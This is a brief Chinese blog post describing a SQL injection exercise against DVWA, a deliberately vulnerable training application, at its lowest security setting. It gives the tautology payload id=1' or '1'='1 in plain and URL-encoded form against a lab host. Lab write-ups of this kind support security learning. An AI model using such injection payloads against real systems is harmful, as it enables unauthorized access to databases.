视频分享地址: https://spac|

明月照江江

园龄:7年4个月粉丝:34关注:0

📂CTF
🔖CTF
2022-10-03 16:18阅读: 31评论: 0推荐: 0

DVWA sqli

level low

可以看到查询请求为

http://192.168.31.xxx/vulnerabilities/sqli/?id=1&Submit=Submit#


##### id 改为 `id=1' or '1'='1` 用来闭合单引号,实现注入

http://192.168.31.xxx/vulnerabilities/sqli/?id=1%27%20or%20%271%27=%20%271&Submit=Submit#

参考: https://www.cnblogs.com/v1vvwv/p/DVWA-SQL-Injection.html

本文作者:明月照江江

本文链接:https://www.cnblogs.com/gradyblog/p/16750687.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   明月照江江  阅读(31)  评论(0编辑  收藏  举报
历史上的今天:
2021-10-03 手写tomcat——netty版
2021-10-03 手写tomcat——有线程池化能力的servlet 服务
2021-10-03 手写tomcat——编写一个提供servlet能力的 http服务器
2021-10-03 手写tomcat——编写一个echo http服务器
2021-10-03 手写tomcat——概述
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起